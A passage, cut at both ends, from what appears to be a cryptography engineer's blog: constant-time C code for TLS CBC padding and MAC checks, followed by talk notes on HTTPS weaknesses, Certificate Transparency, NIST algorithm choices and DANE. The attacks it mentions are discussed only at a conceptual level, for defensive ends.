SSLv3 padding checks are reasonably simple: we need only to test that the padding isn't longer than the record and that it's less than a whole cipher block. We assume that the record is at least a byte long. (Note that the length of the whole record is public information and so we can fast reject invalid records if we're using that length alone.) We can use the fact that, if a and b are bounded such that the MSB cannot be set, then the MSB of a - b is one iff b>a.

padding_length = data[length-1];
unsigned t = (length-1)-padding_length;
unsigned good = DUPLICATE_MSB_TO_ALL(~t);
t = block_size - (padding_length+1);
good &= DUPLICATE_MSB_TO_ALL(~t);

The resulting value of good is a mask value which is all ones iff the padding is valid.

TLS padding

Padding in TLS differs in two respects: the value of the padding bytes is defined and must be checked, and the padding is not required to be minimal. Therefore we must always make memory accesses as if the padding was the maximum length, with an exception only in the case that the record is shorter than the maximum. (Again, the total record length is public information so we don't leak anything by using it.)

Here we use a mask variable (mask), which is all ones for those bytes which should be part of the padding, to discard the result of checking the other bytes. However, our memory access pattern is the same for all padding lengths.

unsigned padding_length = data[length-1];
unsigned good = (length-1)-padding_length;
good = DUPLICATE_MSB_TO_ALL(~good);
unsigned to_check = 255; /* maximum amount of padding. */
if (to_check > length-1) {
        to_check = length-1;
}

for (unsigned i = 0; i < to_check; i++) {
        unsigned t = padding_length - i;
        uint8_t mask = DUPLICATE_MSB_TO_ALL(~t);
        uint8_t b = data[length-1-i];
        good &= ~(mask&(padding_length ^ b));
}

If any of the padding bytes had an incorrect value, or the padding length was invalid itself, one of more of the bottom eight bits of good will be zero. Now we can map any value of good with such a zero bit to 0, and leave the case of all ones the same:

good &= good >> 4;
good &= good >> 2;
good &= good >> 1;
good <<= sizeof(good)*8-1;
good = DUPLICATE_MSB_TO_ALL(good);

In a very similar way, good can be updated to check that there are enough bytes for a MAC once the padding has been removed and then be used as a mask to subtract the given amount of padding from the length of the record. Otherwise, in subsequent sections, the code can end up under-running the record's buffer.

Calculating the MAC

All the hash functions that we're concerned with are Merkle–Damgård hashes and nearly all used in TLS have a 64-byte block size (MD5, SHA1, SHA-256). Some review of this family of hash functions is called for:

All these hash functions have an initial state, a transform function that takes exactly 64 bytes of data and updates that state, and a final_raw function that marshals the internal state as a series of bytes. In order to hash a message, it must be a multiple of 64 bytes long and that's achieved by padding. (This is a completely different padding than discussed above!)

In order to pad a message for hashing, a 0x80 byte is appended, followed by the minimum number of zero bytes needed to make the length of the message congruent to 56 mod 64. Then the length of the message (not including the padding) is written as a 64-bit, big-endian number to round out the 64 bytes. If the length of the message is 0 or ≥ 55 mod 64 then the padding will cause an extra block to be processed.

In TLS, the number of hash blocks needed to compute a message can vary by up to six, depending on the length of the padding and MAC. Thus we can process all but the last six blocks normally because the (secret) padding length cannot affect them. However, the last six blocks need to be handled carefully.

The high-level idea is that we generate the contents of each of the final hash blocks in constant time and hash each of them. For each block we serialize the hash and copy it with a mask so that only the correct hash value is copied out, but the amount of computation is constant.

SHA-384 is the odd one out: it has a 128 byte block size and the serialised length is twice as long, although it is otherwise similar. The example below assumes a 64 byte block size for clarity.

image/svg+xml 0x80 0x00 ... application data 0x00 ... length bytes index_a index_b c

We calculate two indexes: index_a and index_b. index_a is the hash block where the application data ends and the 0x80 byte is put. index_b is the final hash block where the length bytes are put. They may be the same, or index_b may be one greater. We also calculate c: the offset of the 0x80 byte in the index_a block.

The arithmetic takes some thought. One wrinkle so far ignored is that additional data is hashed in prior to the application data. TLS uses HMAC, which includes a block containing the masked key and then there are 13 bytes of sequence number, record type etc. SSLv3 has more than a block's worth of padding data, MAC key, sequence etc. These are collectively called the header here. The variable k in the following tracks the starting position of the data for the constant time blocks and includes this header.

for (i = num_starting_blocks; i <= num_starting_blocks+varience_blocks; i++) {
        uint8_t block[64];
        uint8_t is_block_a = constant_time_eq(i, index_a);
        uint8_t is_block_b = constant_time_eq(i, index_b);
        for (j = 0; j < 64; j++) {
                uint8_t b = 0;
                if (k < header_length) {
                        b = header[k];
                } else if (k < data_plus_mac_plus_padding_size + header_length) {
                        b = data[k-header_length];
                }
                k++;

                uint8_t is_past_c = is_block_a & constant_time_ge(j, c);
                uint8_t is_past_cp1 = is_block_a & constant_time_ge(j, c+1);
                /* If this is the block containing the end of the
                 * application data, and we are at, or past, the offset
                 * for the 0x80 value, then overwrite b with 0x80. */
                b = (b&~is_past_c) | (0x80&is_past_c);
                /* If this the the block containing the end of the
                 * application data and we're past the 0x80 value then
                 * just write zero. */
                b = b&~is_past_cp1;
                /* If this is index_b (the final block), but not
                 * index_a (the end of the data), then the 64-bit
                 * length didn't fit into index_a and we're having to
                 * add an extra block of zeros. */
                b &= ~is_block_b | is_block_a;

                /* The final eight bytes of one of the blocks contains the length. */
                if (j >= 56) {
                        /* If this is index_b, write a length byte. */
                        b = (b&~is_block_b) | (is_block_b&length_bytes[j-56]);
                }
                block[j] = b;
        }

        md_transform(md_state, block);
        md_final_raw(md_state, block);
        /* If this is index_b, copy the hash value to |mac_out|. */
        for (j = 0; j < md_size; j++) {
                mac_out[j] |= block[j]&is_block_b;
        }
}

Finally, the hash value needs to be used to finish up either the HMAC or SSLv3 computations. Since this involves processing an amount of data that depends only on the MAC length, and the MAC length is public, this can be done in the standard manner.

In the case of SSLv3, since the padding has to be minimal, only the last couple of hash blocks can vary and so need to be processed in constant time. Another optimisation is to reduce the number of hash blocks processed in constant time if the (public) record length is small enough that some cannot exist for any padding value.

The above code is a problem to implement because it uses a different hash API than the one usually provided. It needs a final_raw function that doesn't append the hash padding, rather than the common final function, which does. Because of this implementers may be tempted to bodge this part of the code and perhaps the resulting timing side-channel will be too small to exploit, even with more accurate local attacks. Or perhaps it'll be good for another paper!

Extracting the MAC from the record.

We can't just copy the MAC from the record because its position depends on the (secret) amount of padding. The obvious, constant-time method of copying out the MAC is rather slow so my thanks to Emilia Kasper and Bodo Möller for suggesting better ways of doing it.

We can read every location where the MAC might be found and copy to a MAC-sized buffer. However, the MAC may be byte-wise rotated by this copy so we need to do another mac_size2 operations to rotate it in constant-time (since the amount of rotation is also secret):

unsigned mac_end = length;
unsigned mac_start = mac_end - md_size;
/* scan_start contains the number of bytes that we can ignore because the
 * MAC's position can only vary by 255 bytes. */
unsigned scan_start = 0;
if (public_length_inc_padding > md_size + 255 + 1) {
        scan_start = public_length_inc_padding - (md_size + 255 + 1);
}
unsigned char rotate_offset = (mac_start - scan_start) % md_size;

memset(rotated_mac, 0, sizeof(rotated_mac));
for (unsigned i = scan_start; i < public_length_inc_padding; i += md_size) {
        for (unsigned j = 0; j < md_size; j++) {
                unsigned char mac_started = constant_time_ge(i + j, mac_start);
                unsigned char mac_ended = constant_time_ge(i + j, mac_end);
                unsigned char b = 0;
                if (i + j < public_length_inc_padding) {
                        b = data[i + j];
                }
                rotated_mac[j] |= b & mac_started & ~mac_ended;
        }
}

/* Now rotate the MAC */
memset(out, 0, md_size);
for (unsigned i = 0; i < md_size; i++) {
        unsigned char offset = (md_size - rotate_offset + i) % md_size;
        for (j = 0; j < md_size; j++) {
                out[j] |= rotated_mac[i] & constant_time_eq_8(j, offset);
        }
}

Finally, the MAC should be compared in constant time by ORing a value with the XOR of each byte in place from the calculated and given MACs. If the result is zero, then the record is valid. In order to avoid leaking timing information, the mask value from the padding check at the very beginning should be carried throughout the process and ANDed with the final value from the MAC compare.

Limitations of our model

We started out by defining constant-time with a specific model. But this model fails in a couple of ways:

Firstly, extracting the MAC as detailed above is rather expensive. On some chips all memory accesses within a cache-line are constant time and so we can relax our model a little and use a line-aligned buffer to perform the rotation in when we detect that we're building on such a platform.

Secondly, when I sent an early version of the OpenSSL patch to the paper's authors for them to test, they reported that they found a timing difference! I instrumented the OpenSSL code with the CPU cycle counter and measured a median time of 18020 cycles to reject a record with a large amount of padding but only 18004 cycles with small padding.

This difference may be small, but it was stable. To cut a long story short, it came from this line:

unsigned char rotate_offset = (mac_start - scan_start) % md_size;

When the padding was larger, the MAC started earlier in the record (because the total size was the same). So the argument to the DIV instruction was smaller and DIV, on Intel, takes a variable amount of time depending on its arguments!

The solution was to add a large multiple of md_size to make the DIV always take the full amount of time (and to do it in such a way that the compiler, hopefully, won't be able to optimise it away). Certainly 20 CPU cycles is probably too small to exploit, but since we've already “solved” this problem twice, I'd rather not have to worry in the future.

Real World Crypto 2013

(These are my notes for a talk that I gave last week at Real World Crypto. The premise of the conference is that it brings together theoretical cryptographers and practitioners. So this talk is aimed at theoretical cryptographers but it's fairly simple as I don't have anything complex worth saying to real cryptographers! Slides for other talks are linked from the program page and Rogaway's are relevant to this talk.

Note that this isn't a transcript: I actually say more words than this, but it contains the main points.)

Hello all.

For those who don't know me, I'm Adam Langley. I work at Google, mostly on our serving side HTTPS infrastructure these days. But I also still do some work on Chrome's SSL stack from time to time.

When I was asked to come up with a title of a talk I picked “Things that bit us, things we fixed and things that are waiting in the grass” with reference to HTTPS. Partly because that's what I know about but also because HTTPS is the only place where most people knowingly interact with public crypto, so it's one of the few examples of real world crypto at really large, really messy scales.

I could also have titled this talk “Know your enemy” because your real enemy is not trying to achieve an advantage with greater than negligible probability. As I hope to convince you, your enemy is me. I am the idiot who will mess up the implementation of your lovely cryptosystem. Your 128-bit security level is worthless in the face of my stupidity and so I'm here to seek your help in making my life easier and, therefore, everything more secure.

But before we get into anything crypto related, I'd like to set the scene. By and large, transport security on the Internet is doing OK because few people bother to attack it. If you want to steal banking credentials, you can get malware toolkits that will work on a large enough fraction of machines to be useful - e.g. using the Java exploit made public this week. If you want to steal passwords, you can SQL inject the site and reverse the hashes (if the site even bothered to hash), or just use the Ruby on Rails exploit made public this week. Given the level of password reuse, it doesn't even have to be the same site! Economically, attacking the transport doesn't make sense for many attackers and so they don't do it.

If you do want to attack the transport, by far the best methods are SSL stripping, mixed scripting and insecure cookie vulnerabilities.

SSL stripping means that, when the user types in example.com, since the default scheme is unencrypted, the browser makes an insecure request. The attacker can simply answer that request and proxy the entire site while removing any attempts to upgrade to HTTPS. In the majority of cases, the user will never notice.

Mixed scripting results from pages that source Javascript, CSS or plugins from an HTTP URL. The request is made insecurely but the response is trusted with the same authority as the HTTPS origin that requested them. On sites that serve both HTTP and HTTPS, mixed scripting is endemic.

Lastly, cookies are secrets that the client sends to authenticate requests. If, when creating a cookie, the server doesn't set the secure flag, the client will also send the same cookie over unencrypted connections. Since forgetting to set that flag doesn't break anything in normal operation, it happens fairly often.

Oh, and all that is assuming that any transport security is used at all. HTTP is still much more common than HTTPS.

I've breezed over those issues, but the important point is that none of them involve crypto, they're all systems issues. On the whole, the crypto is doing great in comparison to everything else!

I'll cycle back to those issues towards the end but I wanted to give some perspective as I'll be talking about the crypto a lot, since this is Real World Crypto, but crypto is only a small part of web security.

When writing this talk I sat down and made a list of the cryptographic issues that have bitten HTTPS over the past few years and tried to group in order to make points that I think would be useful for the research community. I didn't end up using them all, so this is hardly a exhaustive list and I used some things twice, but here they are:

Go beyond a paper

  1. CRIME (compression leaks.)
  2. BEAST (CBC vs adaptive, chosen plaintext.)

The first group of issues I called ‘go beyond a paper’:

The CRIME attack resulted from the attacker having partial, chosen plaintext abilities on a channel which was performing compression. This applied to both TLS, which supports compression, and SPDY, an HTTP replacement that runs over TLS that applied compression internally. Most, major HTTPS sites don't support TLS compression so SPDY was the bigger hole, but SPDY is a relatively new protocol and the idea that compression can leak information isn't. I can easily find it going back ten years (“Compression and Information Leakage of Plaintext”, Kelsey, 2002) and here's what I said on the SPDY mailing list before the CRIME work:

With a good model of zlib, I think you could extract a ~40 byte cookie with ~13K requests. That's a practical attack and would make a great paper if someone has the time.

Of course, I never had the time but we did start working on a better compression scheme to solve the issue.

But SPDY was done by smart networking folks. Since the compression leak issues weren't known widely enough at the time, they picked gzip as a seemingly reasonable compression algorithm. It wasn't clearly stupid to compose TLS and gzip and yet it blew up when they did so. Had the Kelsey paper instead been a splashy, public demonstration, as CRIME was, then it's possible that the idea would have sunk into the collective memory to the point where simply using gzip wouldn't have seemed so reasonable. As it is, we're now using a horrible gzip hack to segment cookies and other sensitive headers from the attacker controlled values, although the replacement compression is mostly done, pending SPDY 4.

So the first idea in this section is that it's OK to make a splash in order to get some new idea into the minds of the developer community in general.

Somewhat similarly, the origins of the BEAST attack dates back to at least 2002 in the context of SSH (Möller, 2002).

In this case, Rizzo and Duong contacted the major SSL stacks prior to their work going public with a clear case that it was worth looking into. This, at least from my point of view, is very welcome! Please do this if you can. You can contact me if nothing else and I can rope in all the other usual suspects. Please set a clear go-public date and allow us to share the facts of the matter with other major vendors.

In the case of BEAST, this produced a rare example of major browsers breaking things together for the common good. The breakage wasn't trivial: we took out Disneyland Tokyo's online ticking system amongst many others, but we got it deployed.

So the second point of this group is that you should consider treating it like a security disclosure if it's warranted. We don't bite!

The world often sucks

  1. Hash collisions in MD5
  2. BEAST
  3. Downgrade attacks

The second group I put together under the title ‘the world often sucks’.

I'm afraid that sometimes it takes a while to make changes even if we are given a very clear demonstration of the issue. After a very clear demo of MD5 collisions causing vulnerabilities in certificate issuance in 2008 it still took years to remove support for it. Other remedial actions were taken: public CAs were required to use random serial numbers and stopped using MD5 for new certificates. But it wasn't until early 2012 that Chrome removed support for MD5 in signatures. Sadly, many MITM proxies still used MD5 and, despite giving them lots of notice, they didn't do anything and we broke quite a few people with that change.

Of course, later in the year it was found that Flame broke Microsoft's code signing with an MD5 collision. Maybe that'll be enough to convince people to move.

But the point of this section is to encourage people to think about workarounds because the ‘right fix’ often isn't feasible. For hash collisions we have randomised serial numbers and although we might like everyone to be using SHA-256 or SHA-3, realistically those randomised serial numbers are going to be buttressing SHA-1 for quite some time to come.

Marc Stevens talked earlier about how to detect SHA-1 collisions given only one of the colliding messages. That's great! That's absolutely something that we can put into certificate validation now and hopefully prevent problems in the future.

In relation to BEAST: I mentioned that the core weakness had been known since 2002 and, because of that, there was even a workaround in OpenSSL for it: empty fragments. By sending an empty CBC fragment before each real record, the MAC would effectively randomise the IV. However, empty fragments caused compatibility issues because some SSL stacks returned a zero length when encountering them and higher layers of the code took this to be EOF. Because of that, the workaround was never widely enabled.

In the course of discussing BEAST another workaround was proposed: 1/n-1 record splitting. Rather than putting an empty fragment before each record, include a single byte of the plaintext. The protection isn't quite as good, but it solves the EOF problem. Some servers still broke because they assumed that the complete HTTP request would come in a single read, but the lower rate of problems probably made BEAST mitigation viable.

Lastly, there's the first of our snakes in the grass (problems that are still pending to bite us): SSLv3 downgrade. Since there exist so many broken servers and network middleboxes on the Internet that can't handle TLS version negotiation, in the event of a TLS handshake failure browsers will fall back to SSLv3. However, SSLv3 doesn't support all of the features that TLS does. Most significantly from my point of view, it doesn't support ECDHE, which Google servers use. So a network attacker can trigger a fallback and downgrade a capable client to a non-forward secure ciphersuite.

This is obviously not good. The correct fix is to remove the fallback to SSLv3 of course, but that's sadly not viable right now. Instead, as a workaround, Yngve (formerly of Opera) suggested using the TLS renegotiation extension as a signal that a server is reasonably recent and therefore we shouldn't have performed the fallback.

Numbers from Chrome indicate that a high fraction of the servers that we perform fallback for are renego patched, suggesting that's a bad signal and we should instead create a different one. Although maybe the number of fallbacks is dominated by transient network problems and that's skewing the data. Eric Rescorla has suggested replicating the TLS version negotiation using ciphersuite values. It's something that we will hopefully address in one way or another in 2013.

So that's the point of this group: please consider workarounds because we can't always manage to deploy the ‘right’ fix.

Side-channels are a big deal.

  1. RSA PKCS#1 v1.5 padding oracles ("Million message attack")
  2. CBC padding oracles (Vaudenay's attack)
  3. Timing attacks against RSA CRT.
  4. Side-channel attacks against AES
  5. Side-channel attacks against group operations

This big group is about the fact that side channels are a big deal. Writing constant-time code is a very odd corner of programming and not something that can be easily tested. I have a valgrind hack called ctgrind that allows for some automated testing, but it certainly has its limitations.

But what does constant-time even mean? There's the obvious definition: the CPU runs for the same amount of time, independent of any secret inputs. But CPUs are preemptively multitasked and have frequency scaling and thermal limiting these days so that's not a very useful definition in practice. A more workable definition is that if the code were to be run on an abstract Von Neumann machine, then the trace of memory fetches is identical for all secret inputs. That means that the trace of instructions fetched and data accesses is constant for all secret inputs. That takes care of all the obvious problems.

In practice, it can be useful to relax the definition a little and require only that the set of cache lines accessed for data is constant, rather than the exact addresses. In practice CPUs often fetch whole cache lines at a time and using that fact can lead to speedups at the cost of having to know the cache line length of the CPU.

This model assumes that the individual instructions themselves are constant time. As a research topic it would be interesting to know how variable time CPU instructions affect this. For example, from the Intel optimisation manual:

The latency and throughput of IDIV in Enhanced Intel Core micro-architecture varies with operand sizes and with the number of significant digits of the quotient of the division.

Is this a problem, cryptographically? I don't know. I think multiplies on ARM are variable time too. They are on PowerPC, but that's a much more obscure platform.

As a researcher, what's there to keep in mind with respect to constant-time implementations? Firstly, know that Moore's law will never help you. CPUs may get faster, but the amount of data that we need to process is increasing just as fast, if not faster. So you can't assume that the slower, constant time code will become viable in time - you have to be constant time from the start.

Even having a non-constant time implementation is a danger. There are usually two sides to a protocol and I may not control the software on the other side. If I specify AES in a protocol then I have to consider that it may well be a non-constant time implementation. I just made up the term ‘implementation ecosystem’ for this. AES is very difficult to implement securely in software: good implementations are still still topics for research papers. So the implementation ecosystem for AES is terrible! There are lots and lots of side-channel vulnerable implementations out there because no normal person, given the AES spec, will produce a secure implementation.

If we're aiming for a 128-bit security level then that possibility is a much larger problem than many other, more traditional crypto concerns.

So, for new primitives, you may want to produce solid implementations for different platforms to seed the implementation ecosystem. Not just reference implementations, but ones that are good enough that they dominate the set of implementations. For example, if I specify curve25519 in a protocol, I can be pretty sure that everyone is going to be using djb's reference code. That's a major advantage.

You should consider what an implementation is going to look like when designing. Of course, building a solid implementation will make sure that you end up considering this, so that's another good reason. There are certain patterns that are inherently dangerous. Square-and-multiply loops for example. You should recognise that and make sure that even the description of the algorithm includes counter measures. Binary fields are another which are very likely to result in non-constant time code.

Lastly, please don't assume that CPU changes are going to solve your constant-time or performance problems. Intel have added specific instructions for AES and binary fields in their latest chips and, while that does have some benefit, they will be a small fraction of all chips for a very long time. The chance of both sides of a connection having these chips is even smaller.

Cryptographic Room 101.

Room 101 is a fairly long running British TV show where people nominate things they dislike to put into Room 101, which banishes them from the world. Based on the above I've a number of things that I'd to put into Room 101, from least controversial to most. These are more specific points than the general ones that I just made and I'd like to see if anyone in the room disagrees with me!

1. MAC then Encrypt.

I hope that everyone agrees on this. Of course, it's pretty ubiquitous in the world today. Just because I want to banish something doesn't mean that I'm not going to spend years dealing with it in the future!

2. CBC mode.

With all the problems of chosen plaintexts, padding oracles etc I think it's time to get rid of CBC mode forever. Although it's possible to implement it securely, it's been done wrong for so long and is so easy to mess up, I think it's best to get rid of it.

3. ‘Sudden death’ entropy failure: plain DSA.

DSA (and ECDSA) has a very unfortunate property that an entropy failure leaks the private key. Even a slight bias over many signatures can be exploited. This is ridiculous. As Nadia and Debian have demonstrated, entropy failures do happen and they are inherently very bad. But that's not a reason to amplify them! By hashing in the private key and message, this problem can be avoided. So please consider what happens when your nonces are actually ntwices.

4. AES-GCM.

I've saved the really controversial one for last!

AES-GCM so easily leads to timing side-channels that I'd like to put it into Room 101. It took a decade of research to produce solid, high-speed, constant time AES implementations and they are very complex. In that decade, many, many non-constant time AES implementations have found their way into everything, poisoning the ecosystem when it comes to using AES.

I haven't seen any research on extracting the key from GHASH, but I've certainly seen vulnerable implementations and there's every reason to believe that it's possible. Most GHASH implementations look like AES implementations from 10 years ago. I'm aware of one, reasonable, constant-time AES-GCM implementation (Käsper and Schwabe, CHES 2009), but it runs at 22 cycles/byte on a Core2.

If you have a recent Intel chip, and software that implements AES-GCM using the specific instructions provided, then it's great. But most chips don't have that and I think it would have been much more preferable to pick an AEAD that's easy to securely implement everywhere and then speed it up on certain chips.

But it's still much better than AES-CBC I guess!

(At this point I cycled back to talking about the larger transport security issues and how browsers are addressing them with HSTS, mixed script blocking etc. But I've written about that before.)

Certificate Transparency

These are my notes for a talk that I gave today at IETF 85. For more details, see the draft.

Certificates are public statements that everyone trusts, but they aren't public record. Other critical details about companies are generally public record, their address, directors etc, but not their public key. Why not? Work like the EFF Observatory has already means that CA customer lists, which they might consider confidential, are public.

If certificates were public record then you would be able to see what CAs are asserting about you, and hopefully correct any mistakes. I would very much like to know the set of valid certificates within google.com at any given time. I know about the real ones, of course, but I don’t know that there aren’t others. At the moment, there's no accountability for CAs unless you get really, publicly caught screwing up.

However, there is a class of certificates that we don't want published: internal names. Some companies get certificates from a real CA for their internal networks and those names should not be published. So we'll keep that in mind as we work out a design.

How might we achieve this? Well, we could have CAs publish the certificates that they issue. That's a good start; and actually useful to some degree, but you'll probably admit that this is weaker than we might like, so how do we make it stronger?

So that's our design goal, now let's talk about the constraints:

Firstly, we aren't going to update every HTTPS server on the planet. Any design must be incrementally deployable and, initially, we are talking about HTTPS. Hopefully any design would be generally applicable, but HTTPS is what we have in mind right now.

Secondly, no blocking lookups. Making calls to a third-party during certificate validation is very convenient, but it's just too costly. It creates latency when it's working and a disaster when it's not. Too many networks filter too much for it to be dependable and we've never managed to make it work for OCSP, so there's little chance that it'll work for this.

So whatever information we need to get to the client has to be in the handshake, and anything that client needs to report back has to be asynchronous.

We had our straw-man proposal where we just ask CAs to publish their certificate stream, but we want to do better because that only works when the CA is simply mistaken. So the problem that we need to address is how do clients know that a certificate they receive has been published at all?

Well, we can have an independent certificate log sign a statement of publication and, based on our constraints, we have to put that signature somewhere in the TLS handshake. We call the statements of publication Signed Certificate Timestamps and, since we don't want to delay certificate issuance, they’re not actually statements of publications, rather they are a promise that the certificate will be published soon.

Now we've just moved the problem from "what if the CA doesn't publish it?" to "what if the log promises to publish something, but doesn't?". We can require SCTs from a quorum of independent logs, and we'll do that, but running an append only log is a job that can be verified by clients.

In order to make a log verifiable, we put the log entries in a Merkle tree, with certificates at the leaves. Each log is an ever growing Merkle tree of certificates and the log periodically signs the root of the tree and publishes it, along with all the entries. But what does `periodically' mean? All logs must publish certificates that they have received within a time called the Maximum Merge Delay. That merge delay is the amount of time that a certificate can be used without being published.

We detect violations of the MMD by having clients verify the log's behaviour. Clients can request from the logs (or a mirror), a path from any certificate to the root of a published Merkle tree. In order to preserve client privacy this request may be made via DNS, if possible, or by requesting paths for a range of certificates rather than a specific one.

Once a client has a signed root, it needs to gossip about it. Clients implicitly trust their software provider so one common answer may be to request a signed statement that the log root has been observed from an auditor service run by them. But these auditors can be run by anyone, and clients can configure their auditor however they like.

Since these client checks are asynchronous, they can be blocked by an attacker. Clients will have to be tolerant to that to some extent because many networks are indistinguishable to an attack. However, if after some amount of time, the client has a certificate that it hasn't been able to check, or a log root that it hasn't verified with its auditor, it should try to publish it in various, unspecified ways. In the extreme, one can imagine asking the user to email a file to an email address.

So to `break' this system, by which I mean to get a certificate that will be silently accepted by clients without the world knowing about it, one needs to compromise a CA, a quorum of logs, and then either partition the client forever, or also compromise the client's auditor.

In addition to auditors, there’s another class of log observers: monitors. Monitors watch the logs for interesting events. We envision at least one, obvious, type of monitor service: an `alerts’ system where anyone can sign-up to receive emails when a certificate is issued in a certain domain.

So now some practical points:

First, how do we get the SCTs (the receipts from the logs) into the TLS handshake without altering every HTTPS server? Well, the one thing that every HTTPS server can do is serve a certificate chain. So we tried a couple of tricks:

One, we tried adding a superfluous certificate to the end of the chain. Most clients will ignore it, but a few smaller ones, and old versions of Android, don't and IIS doesn't like configuring such a chain. So we aren't pushing ahead with that idea.

We also tried putting SCTs into the unsigned portion of the leaf certificate and that works fairly well except for breaking Java. Nonetheless, we may continue to support that as an option.

And options are the way we're going to go with this problem: there doesn't seem to be a good single answer.

So another option is that CAs can do the work for you and put the SCTs into the signed part of the certificate, in an X.509 extension. Of course, the SCT contains a hash of the certificate, and a hash cannot include itself, so CAs issue a `pre-cert' from a special intermediate with a magic EKU that makes it invalid for normal use. The pre-cert can be submitted to the logs to get SCTs for embedding in the real certificate.

Another way in which CAs can do it for you is to put the SCTs in an OCSP response and then one uses OCSP stapling on the server.

Finally, for servers that can be updated, SCTs can be included in an Authorisation Data TLS-extension, and support for that is working its way through OpenSSL and Apache.

We're experimenting with CAs at the moment to find what works and we may whittle down this list in time. But for now we're promiscuous about solutions to this problem.

The logs also have to worry about spam, so they only accept certificate chains that end at a known root. There's a very low bar for the logs to accept a root because it doesn't grant any authority, it's just an anti-spam measure, but we do have to make sure that the logs can’t be spammed to death.

Going back to one of our requirements at the beginning: we don't want to log internal names in certificates. One solution to this is to allow intermediates with name constraints to be logged and then any certificates from there don't need to be. So an intermediate constrained to issue within example.com can be logged and then we don't need to log any leaf certificates within example.com: they can't be used against anyone else and, by using an intermediate, its security is up to you.

However, that's a little complex so the initial solution will probably be that we let companies configure the clients to say "don't require logging within these domains". At least for Chrome, people report great success with our Enterprise Policy configuration and that's an easy route for such config.

Lastly, the very tricky question: deployment.

Initially we can deploy in the same manner as pinning and HSTS: require it only for certain, opt-in domains (or possibly for opt-in CAs). But the goal is very much to get it everywhere. That will take years, but we do plan to do it. We need to make the error messages in the browser informative for server admins as well as users because this will be something new for them, although hopefully their CA will just take care of it. We can also enforce it for certificates issued past a certain date, rather than having a flag day. That way the certificate change will be the triggering factor, which is something under the control of the site. Lastly, we'll probably have to do the work to patch software like EJBCA.

We do not yet know exactly who will be running the logs, nor how many we want. But Google expects to run one and that project is staffed. We’re also working with Digicert and Comodo who are experimenting with CT integration and are considering running logs.

Since we can verify the operation of logs, they don't have the same trusted status as CAs. However, the set of logs has to be globally agreed so having to revoke a log would be a pain, so we do want logs that are operationally competent.

There is no doubt that this will be a difficult and lengthy deployment process. But it doesn't seem completely hopeless.

NIST may not have you in mind

A couple of weeks back, NIST announced that Keccak would be SHA-3. Keccak has somewhat disappointing software performance but is a gift to hardware implementations.

This is rather a theme for NIST selected algorithms. AES includes a number of operations on a binary field and CPUs generally don't implement binary field operations because they aren't really useful for anything else. So many software implementations of AES include four, 1024-byte tables of results in that field in order to achieve reasonable performance. However, these table lookups cause a timing side-channel which is fairly effective even over a network. On the same machine, where the CPU cache state can be probed more directly, it's very effective.

In response to this, some AES implementations made their tables smaller to reduce the leak. That's obviously an improvement, but it came at the cost of slowing AES down and AES was never very quick to start off with. And while a smaller leak is better, AES is supposed to be operating at (at least) an 128-bit security level!

Next, the mode recommended for AES by NIST is GCM: it's AES in counter mode coupled with a polynomial authenticator. Cryptographically this is perfectly sensible but the polynomial authenticator uses binary fields again. For a hardware implementation, this is another gift but software implementations need, yet again, tables in memory to implement it at reasonable speed.

Tables not only cause problems with timing side-channels, they also cause slowdowns that don't appear in micro-benchmarks. Tables are great when the benchmark is running with a single key and they are contained in L1 cache. But when running in a larger system, the cache pressure causes slowdowns and the real-world speed of an such an algorithm can be dramatically less than the benchmarks suggest.

But there's no reason why a polynomial authenticator needs to use binary fields. Why not use a field that CPUs actually implement? If you do so you get a very fast authenticator with dramatically improved key agility.

So why does NIST continually pick algorithms that aren't suited to software implementations? One of my colleagues proffers (somewhat jokingly) a conspiracy theory but I suspect that the answer is much more mundane. At USENIX Security this year, Dickie George gave an excellent keynote involving some NSA history and described how they would spend a decade or more designing a cryptographic system from the chip upwards. Everything was custom built, carefully designed and it was a completely closed system. It's certainly nice to be able to do that!

If you're designing such a system, of course you would be orientated towards hardware. Every implementation of your system would be a custom-designed chip; there's no benefit to making something easy to implement on commodity systems. And, in that world, AES, GCM, and SHA3 make a lot of sense. As the GCM paper says, “binary Galois field multiplication is especially suitable for hardware implementations”. I'm assuming that there's a fair amount of shared worldview between NIST and the NSA, but that doesn't seem unreasonable.

(In a NIST paper about the selection of AES they state: “table lookup: not vulnerable to timing attacks.” Oops. If you're building your own hardware, maybe.)

I'm not suggesting that the NSA is actually using AES, GCM etc in their own designs. But a generation or more of cryptographers from that world are probably comfortable with features that were chosen with hardware in mind. Those features, like binary fields, are what they will naturally gravitate towards.

People who aren't in the situation of designing custom chips, but rather have to design protocols for implementation on a menagerie of commodity chips, might want to consider that NIST doesn't appear to have them in mind. Although hardware implementations of AES have existed for a while, unless they are CPU instructions (like AES-NI), then the system-call overhead can cause the acceleration to be slower than the plain CPU for common, 1400-byte, chunk sizes. Even when you have a CPU instruction to implement AES and GCM, it's unlikely that all the chips that your code is going to run on will be so endowed.

Hardware implementations of these, poorly-suited primitives also take chip area and development time away from other tasks. Why not choose primitives that use CPU abilities that lots of code benefits from? Then optimisations of those CPU instructions lifts all boats.

So if you want to pick algorithms designed for CPUs, try Salsa20 rather than AES and Poly1305 rather than GCM. But we don't have a great answer for a modern hash function I'm afraid, and that's a little disappointing. SHA-2 is fine for now, although Zooko has some thoughts on the matter.

(I should note that, thanks to some great work by djb, Peter Schwabe, Emilia Käsper and others, we do have bitsliced, constant-time implementations of AES now that run reasonably fast (for AES). But it's only effective for counter mode, and I believe that it needs long streams of data to achieve its headline speed. (A commenter pointed out that it can be made to work with only 8 blocks. Later, another pointed out that that I'm doubly wrong! We can do it for single blocks in reasonable time.) That's great, but it took 10 years of optimisation work and implies that AES can only be effectively implemented by some of the best practical cryptographers in the world.)

DANE stapled certificates

We've supported DNSSEC stapled certificates in Chrome for a while now and since the DANE RFC has been published, it's about time that I updated that code to support DANE, rather than the hacked up CAA record that it currently uses.

I've written the DANE code, but it also seemed like an opportune time to reevaluate the idea. The promise of DNSSEC, as Dan Kaminsky put it, it that it can reduce the number of meetings required to get something done.

You have a whole bunch of internal hosts that some company that you're partnering with needs to interface with securely? Well, perhaps you used an internal CA, so will they install that root on their systems? (Meeting.) They will if it's name constrained, can we get it reissued with name constraints? (Meeting.) Ok, now can IT get that root pushed out everywhere? (Meeting.) You see how this is going.

But every bit of code needs to justify its complexity and, for small cases, StartSSL will give you free certificates. Perhaps just Chrome doing it isn't very interesting, and everyone hacks up custom solutions anyway.

So, if it's useful to you, you should let me know (agl at chromium dot org).

CRIME

